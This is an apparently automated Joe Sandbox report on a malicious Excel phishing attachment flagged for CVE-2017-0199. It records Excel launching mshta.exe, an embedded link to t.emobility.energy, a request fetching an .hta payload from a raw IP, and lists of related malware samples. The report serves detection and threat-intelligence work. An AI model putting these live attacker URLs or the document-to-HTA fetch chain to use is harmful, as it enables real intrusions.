Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global traffic TCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global traffic TCP traffic: 13.107.246.40:443 -> 192.168.2.9:49702
Source: global traffic TCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global traffic TCP traffic: 13.107.246.40:443 -> 192.168.2.9:49703
Source: Joe Sandbox View IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49701 -> 13.107.246.40:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49702 -> 13.107.246.40:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49703 -> 13.107.246.40:443
Source: global traffic HTTP traffic detected: GET /3yRDYq?&balance=tested&cleaner HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: t.emobility.energy Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xampp/kiss/zynewdaysnewtimeforbestthingstohappenedever.hta?&advantage=solid HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Host: 217.154.55.185
Source: unknown TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro) Host: otelrules.svc.static.microsoft
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro) Host: otelrules.svc.static.microsoft
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro) Host: otelrules.svc.static.microsoft
Source: global traffic HTTP traffic detected: GET /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?6a8babc50d5d255e HTTP/1.1 Connection: Keep-Alive Accept: */* If-Modified-Since: Thu, 05 Dec 2024 19:42:09 GMT If-None-Match: "06cfcc54d47db1:0" User-Agent: Microsoft-CryptoAPI/10.0 Host: ctldl.windowsupdate.com
Source: global traffic HTTP traffic detected: GET /msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?526cae6927517da1 HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/10.0 Host: ctldl.windowsupdate.com
Source: global traffic DNS traffic detected: DNS query: t.emobility.energy
Source: global traffic DNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: ENQUIRY - RFQ 674441-76450.xla.xlsx, F4B20000.0.dr String found in binary or memory: https://t.emobility.energy/3yRDYq?&balance=tested&cleaner&
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown HTTPS traffic detected: 162.19.137.157:443 -> 192.168.2.9:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.9:49701 version: TLS 1.2

System Summary

Source: ENQUIRY - RFQ 674441-76450.xla.xlsx | OLE: Microsoft Excel 2007+
Source: ~DF47F8F0D42EFF3FED.TMP.0.dr | OLE: Microsoft Excel 2007+
Source: F4B20000.0.dr | OLE: Microsoft Excel 2007+
Source: ENQUIRY - RFQ 674441-76450.xla.xlsx | OLE indicator, VBA macros: true
Source: ENQUIRY - RFQ 674441-76450.xla.xlsxStream path 'MBD00356DE1/\x1Ole' : https://t.emobility.energy/3yRDYq?&balance=tested&cleaner&FJTEliEOp>9[ih<)c=AF$k.l#2K!/k@V7vGE96HjTL9gDbIc6jciN6ZJDg60xlZsFkd6BjIQtdi6QXmh75ZsfEDzOgNFwgtZwjWR5IWiaO6QUIEzexmXovQxLdAHFrqo80t4SemnyScNBQJL9msT6diKjIoCrrFKjQ6nKsNseCQYmn5KuseZIAMtwvlKFmXNTgLQ4PL9srKmsRNpBK0gVc5uIXZnIjuj0DHsY3S72UlmbpkX8u9eBKZFyH7yAOCjvGX1we2oFu5A.)RtrYQZK
Source: F4B20000.0.drStream path 'MBD00356DE1/\x1Ole' : https://t.emobility.energy/3yRDYq?&balance=tested&cleaner&FJTEliEOp>9[ih<)c=AF$k.l#2K!/k@V7vGE96HjTL9gDbIc6jciN6ZJDg60xlZsFkd6BjIQtdi6QXmh75ZsfEDzOgNFwgtZwjWR5IWiaO6QUIEzexmXovQxLdAHFrqo80t4SemnyScNBQJL9msT6diKjIoCrrFKjQ6nKsNseCQYmn5KuseZIAMtwvlKFmXNTgLQ4PL9srKmsRNpBK0gVc5uIXZnIjuj0DHsY3S72UlmbpkX8u9eBKZFyH7yAOCjvGX1we2oFu5A.)RtrYQZK
Source: ~DF47F8F0D42EFF3FED.TMP.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Window title found: microsoft excel okexcel cannot open the file 'enquiry - rfq 674441-76450.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engine | Classification label: mal60.expl.winXLSX@6/9@2/4
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Users\user\Desktop\~$ENQUIRY - RFQ 674441-76450.xla.xlsx
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{46B76D48-6942-4512-9975-9C110794EC42} - OProcSessId.dat
Source: ENQUIRY - RFQ 674441-76450.xla.xlsx | OLE indicator, Workbook stream: true
Source: F4B20000.0.dr | OLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ENQUIRY - RFQ 674441-76450.xla.xlsx | Virustotal: Detection: 27%
Source: ENQUIRY - RFQ 674441-76450.xla.xlsx | ReversingLabs: Detection: 27%
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ENQUIRY - RFQ 674441-76450.xla.xlsx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: c2r32.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: ENQUIRY - RFQ 674441-76450.xla.xlsx | Static file information: File size 1304064 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: ~DF47F8F0D42EFF3FED.TMP.0.dr | Initial sample: OLE indicators vbamacros = False
Source: ENQUIRY - RFQ 674441-76450.xla.xlsx | Initial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: ENQUIRY - RFQ 674441-76450.xla.xlsx | Stream path 'MBD00356DE0/Package' entropy: 7.97779971333 (max. 8.0)
Source: ENQUIRY - RFQ 674441-76450.xla.xlsx | Stream path 'Workbook' entropy: 7.99942891107 (max. 8.0)
Source: ~DF47F8F0D42EFF3FED.TMP.0.dr | Stream path 'Package' entropy: 7.97113385116 (max. 8.0)
Source: F4B20000.0.dr | Stream path 'MBD00356DE0/Package' entropy: 7.97113385116 (max. 8.0)
Source: F4B20000.0.dr | Stream path 'Workbook' entropy: 7.9995949109 (max. 8.0)
Source: C:\Windows\splwow64.exe | Window / User API: threadDelayed 938
Source: C:\Windows\splwow64.exe | Last function: Thread delayed
Source: C:\Windows\splwow64.exe | Thread delayed: delay time: 120000
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information queried: ProcessInformation
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 13 Exploitation for Client Execution | 1 Scripting | 1 Process Injection | 2 Masquerading | OS Credential Dumping | 1 Process Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Process Injection | Security Account Manager | 1 Application Window Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
[Behavior graph, image not preserved. Behavior Graph ID: 1646794; Sample: ENQUIRY - RFQ 674441-76450....; Startdate: 24/03/2025; Architecture: WINDOWS; Score: 60.
Processes: two EXCEL.EXE instances started; one EXCEL.EXE instance started splwow64.exe and mshta.exe and dropped C:\...\~$ENQUIRY - RFQ 674441-76450.xla.xlsx (data).
DNS/IP nodes: t.emobility.energy; star-azurefd-prod.trafficmanager.net; 5 other IPs or domains; s-part-0012.t-0009.t-msedge.net (13.107.246.40, 443, 49701, 49702, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States); microsoft-10.ovslegodl.sched.ovscdns.com (43.152.182.96, 49687, 49689, 80, LILLY-ASUS, Japan); 2 other IPs or domains.
Signatures: Multi AV Scanner detection for submitted file; Excel sheet contains many unusual embedded objects; Document exploit detected (process start blacklist hit); Sigma detected: Suspicious Microsoft Office Child Process.]

Source | Detection | Scanner | Label
ENQUIRY - RFQ 674441-76450.xla.xlsx | 28% | Virustotal |
ENQUIRY - RFQ 674441-76450.xla.xlsx | 28% | ReversingLabs | Document-Excel.Exploit.CVE-2017-0199

No Antivirus matches
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
https://t.emobility.energy/3yRDYq?&balance=tested&cleaner& | 0% | Avira URL Cloud | safe
https://t.emobility.energy/3yRDYq?&balance=tested&cleaner | 0% | Avira URL Cloud | safe


Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0012.t-0009.t-msedge.net | 13.107.246.40 | true | false | | high
host1.emobility.energy | 162.19.137.157 | true | false | | unknown
microsoft-10.ovslegodl.sched.ovscdns.com | 43.152.182.96 | true | false | | high
s-0005.dual-s-msedge.net | 52.123.128.14 | true | false | | high
otelrules.svc.static.microsoft | unknown | unknown | false | | high
t.emobility.energy | unknown | unknown | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundle | false | | high
https://t.emobility.energy/3yRDYq?&balance=tested&cleaner | false | Avira URL Cloud: safe | unknown
https://otelrules.svc.static.microsoft/rules/rule120607v1s19.xml | false | | high
https://otelrules.svc.static.microsoft/rules/rule120603v8s19.xml | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://t.emobility.energy/3yRDYq?&balance=tested&cleaner& | ENQUIRY - RFQ 674441-76450.xla.xlsx, F4B20000.0.dr | false | Avira URL Cloud: safe | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
13.107.246.40 | s-part-0012.t-0009.t-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
43.152.182.96 | microsoft-10.ovslegodl.sched.ovscdns.com | Japan | 4249 | LILLY-ASUS | false
217.154.55.185 | unknown | United Kingdom | 8897 | KCOM-SPNService-ProviderNetworkex-MistralGB | false
162.19.137.157 | host1.emobility.energy | United States | 209 | CENTURYLINK-US-LEGACY-QWESTUS | false

Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1646794
Start date and time: 2025-03-24 09:31:13 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ENQUIRY - RFQ 674441-76450.xla.xlsx
Detection: MAL
Classification: mal60.expl.winXLSX@6/9@2/4
EGA Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .xlsx
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Active ActiveX Object
  • Active ActiveX Object
  • Scroll down
  • Close Viewer
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, MavInject32.exe
  • Excluded IPs from analysis (whitelisted): 52.109.0.91, 23.204.23.20, 52.109.8.36, 13.89.179.10, 20.44.10.123, 52.123.128.14, 4.175.87.197, 20.190.152.19
  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedscolprdcus12.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, mobile.events.data.microsoft.com, onedscolprdcus05.centralus.cloudapp.azure.com, roaming.officeapps.live.com, osiprod-cus-buff-azsc-000.centralus.cloudapp.azure.com, dual-s-0005-office.config.skype.com, login.live.com, wus-azsc-config.officeapps.live.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, c.pki.goog, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, cus-azsc-000.roaming.officeapps.live.com, fe3cr.delivery.mp.microsoft.com, us1.roaming1.live.com.akadns.net, config.officeapps.live.com, us.configsvc1.live.com.akadns.
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadFile calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Time | Type | Description
04:33:25 | API Interceptor | 989x Sleep call for process: splwow64.exe modified

Match | Associated Sample Name / URL | Detection | Threat Name | Context
13.107.246.40 | Payment Transfer Receipt.shtml | malicious | HTMLPhisher | www.aib.gov.uk/
13.107.246.40 | NEW ORDER.xls | malicious | Unknown | 2s.gg/3zs
13.107.246.40 | PO_OCF 408.xls | malicious | Unknown | 2s.gg/42Q
13.107.246.40 | 06836722_218 Aluplast.docx.doc | malicious | Unknown | 2s.gg/3zk
13.107.246.40 | Quotation.xls | malicious | Unknown | 2s.gg/3zM
217.154.55.185 | Payment Advice 24-03-2025.docx.doc | malicious | Unknown |
217.154.55.185 | Payment Advice 24-03-2025.docx.doc | malicious | Unknown |
162.19.137.157 | Payment Advice 24-03-2025.docx.doc | malicious | Unknown |
162.19.137.157 | Payment Advice 24-03-2025.docx.doc | malicious | Unknown |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
microsoft-10.ovslegodl.sched.ovscdns.com | exodus-inject.js | malicious | Unknown | 43.152.183.76
microsoft-10.ovslegodl.sched.ovscdns.com | new.bat | malicious | Unknown | 43.175.186.85
microsoft-10.ovslegodl.sched.ovscdns.com | https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=r3yI_dSxOEiPJ_sFtWv0u-et2ubyS_1IvjO44TlrG4RUNU4xQUtYREpWQVhXSzJWUVMxMkwySkhRUS4u | malicious | HTMLPhisher | 43.175.186.87
microsoft-10.ovslegodl.sched.ovscdns.com | https://energy.economictimes.indiatimes.com/redirect.php?url=///itemsidguest.com | malicious | Unknown | 43.152.183.76
microsoft-10.ovslegodl.sched.ovscdns.com | Setup.exe | malicious | Unknown | 43.152.135.101
microsoft-10.ovslegodl.sched.ovscdns.com | DE 34212 MELSUNGE.docx | malicious | Unknown | 43.175.138.218
microsoft-10.ovslegodl.sched.ovscdns.com | http://hoangboy23.github.io/ | malicious | HTMLPhisher | 43.175.151.231
microsoft-10.ovslegodl.sched.ovscdns.com | https://cf7ea538-cbf0-4778-9cd4-8fb731f769e4-00-3qzkmy7nk9jfp.pike.replit.dev/ | malicious | Unknown | 101.33.11.219
microsoft-10.ovslegodl.sched.ovscdns.com | https://www.gbt-inc.com/ | malicious | Unknown | 43.175.151.205
microsoft-10.ovslegodl.sched.ovscdns.com | http://croxyproxys.com | malicious | Unknown | 43.175.151.230
s-0005.dual-s-msedge.net | Payment Advice 24-03-2025.docx.doc | malicious | Unknown | 52.123.128.14
s-0005.dual-s-msedge.net | Payment Advice 24-03-2025.docx.doc | malicious | Unknown | 52.123.128.14
s-0005.dual-s-msedge.net | https://waimao-north-star-mail.qiye.163.com/api/j/html?c=https%3A%2F%2F1drv.ms%2Fo%2Fs!AjlMaeoI5pi7f_GXm50IY_RD-sw%3Fe%3DEsmwj4%3Fcid%3Dsite_nqmm3LQS7c9jn-2FWvVcVpMl0NsyUA8yUApYElnaeUm2Ly_xlUzBpbEuL | malicious | Unknown | 52.123.128.14
s-0005.dual-s-msedge.net | backwith.doc | malicious | Unknown | 52.123.129.14
s-0005.dual-s-msedge.net | backwith.doc | malicious | Unknown | 52.123.129.14
s-0005.dual-s-msedge.net | PC900-1new.exe | malicious | XRed | 52.123.128.14
s-0005.dual-s-msedge.net | PC900-1new.exe | malicious | XRed | 52.123.129.14
s-0005.dual-s-msedge.net | 478# Confirmation Letter HR Team..eml | malicious | Unknown | 52.123.129.14
s-0005.dual-s-msedge.net | oddj60.1EqD3.exe | malicious | XRed, XWorm | 52.123.129.14
s-0005.dual-s-msedge.net | DA6B.bat | malicious | XRed, XWorm | 52.123.129.14
host1.emobility.energy | Payment Advice 24-03-2025.docx.doc | malicious | Unknown | 162.19.137.157
host1.emobility.energy | Payment Advice 24-03-2025.docx.doc | malicious | Unknown | 162.19.137.157
                            s-part-0012.t-0009.t-msedge.nethttps://waimao-north-star-mail.qiye.163.com/api/j/html?c=https%3A%2F%2F1drv.ms%2Fo%2Fs!AjlMaeoI5pi7f_GXm50IY_RD-sw%3Fe%3DEsmwj4%3Fcid%3Dsite_nqmm3LQS7c9jn-2FWvVcVpMl0NsyUA8yUApYElnaeUm2Ly_xlUzBpbEuLGet hashmaliciousUnknownBrowse
                            • 13.107.246.40
                            https://offce365.auramisteriosafyr.it.com/CM4kN/Get hashmaliciousHTMLPhisherBrowse
                            • 13.107.246.40
                            PC900-1new.exeGet hashmaliciousXRedBrowse
                            • 13.107.246.40
                            SecuriteInfo.com.Win64.CrypterX-gen.5834.27621.exeGet hashmaliciousVidarBrowse
                            • 13.107.246.40
                            Player666.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.40
                            oddj60.1EqD3.exeGet hashmaliciousXRed, XWormBrowse
                            • 13.107.246.40
                            DA6B.batGet hashmaliciousXRed, XWormBrowse
                            • 13.107.246.40
                            3417774.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.40
                            weDo11E3Lr.exeGet hashmaliciousLummaC StealerBrowse
                            • 13.107.246.40
                            WizClient.exeGet hashmaliciousXWormBrowse
                            • 13.107.246.40
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            LILLY-ASUSarm.fkunigr.elfGet hashmaliciousMiraiBrowse
                            • 43.56.116.206
                            mips.elfGet hashmaliciousMirai, MoobotBrowse
                            • 43.56.252.108
                            sh4.elfGet hashmaliciousMirai, MoobotBrowse
                            • 43.58.120.247
                            https://offce365.auramisteriosafyr.it.com/CM4kN/Get hashmaliciousHTMLPhisherBrowse
                            • 43.128.193.190
                            resgod.mips.elfGet hashmaliciousMiraiBrowse
                            • 43.145.117.243
                            resgod.x86.elfGet hashmaliciousMiraiBrowse
                            • 42.129.237.20
                            owari.m68k.elfGet hashmaliciousUnknownBrowse
                            • 40.171.13.125
                            owari.arm5.elfGet hashmaliciousUnknownBrowse
                            • 40.165.168.94
                            owari.ppc.elfGet hashmaliciousUnknownBrowse
                            • 40.158.15.83
                            owari.i586.elfGet hashmaliciousUnknownBrowse
                            • 40.196.205.168
                            KCOM-SPNService-ProviderNetworkex-MistralGBPayment Advice 24-03-2025.docx.docGet hashmaliciousUnknownBrowse
                            • 217.154.55.185
                            Payment Advice 24-03-2025.docx.docGet hashmaliciousUnknownBrowse
                            • 217.154.55.185
                            Client.exeGet hashmaliciousQuasarBrowse
                            • 212.56.35.232
                            H67PoQSrNz.exeGet hashmaliciousQuasarBrowse
                            • 212.56.35.232
                            iaminthebestdutyservicewithgreatnessgiven.htaGet hashmaliciousRemcosBrowse
                            • 217.154.16.81
                            888.exeGet hashmaliciousGO BackdoorBrowse
                            • 195.200.31.22
                            73ybGtnYXx.exeGet hashmaliciousWhiteSnake StealerBrowse
                            • 194.164.198.113
                            m68k.elfGet hashmaliciousMiraiBrowse
                            • 158.179.55.1
                            Owncloud.exeGet hashmaliciousGO Backdoor, LummaC StealerBrowse
                            • 195.200.31.22
                            Acrobat.exeGet hashmaliciousScreenConnect ToolBrowse
                            • 86.54.42.29
                            CENTURYLINK-US-LEGACY-QWESTUSPayment Advice 24-03-2025.docx.docGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            Payment Advice 24-03-2025.docx.docGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            arm.fkunigr.elfGet hashmaliciousMiraiBrowse
                            • 209.181.9.180
                            resgod.ppc.elfGet hashmaliciousMiraiBrowse
                            • 75.174.171.216
                            resgod.x86.elfGet hashmaliciousMiraiBrowse
                            • 184.98.240.216
                            owari.i686.elfGet hashmaliciousUnknownBrowse
                            • 67.150.235.52
                            owari.ppc.elfGet hashmaliciousUnknownBrowse
                            • 137.107.82.164
                            owari.sh4.elfGet hashmaliciousUnknownBrowse
                            • 97.118.188.84
                            owari.mips.elfGet hashmaliciousUnknownBrowse
                            • 70.57.201.132
                            loligang.ppc.elfGet hashmaliciousMiraiBrowse
                            • 63.239.57.253
                            MICROSOFT-CORP-MSN-AS-BLOCKUSarm.fkunigr.elfGet hashmaliciousMiraiBrowse
                            • 23.100.229.117
                            Z9dgTYzz4x.exeGet hashmaliciousRHADAMANTHYSBrowse
                            • 150.171.27.11
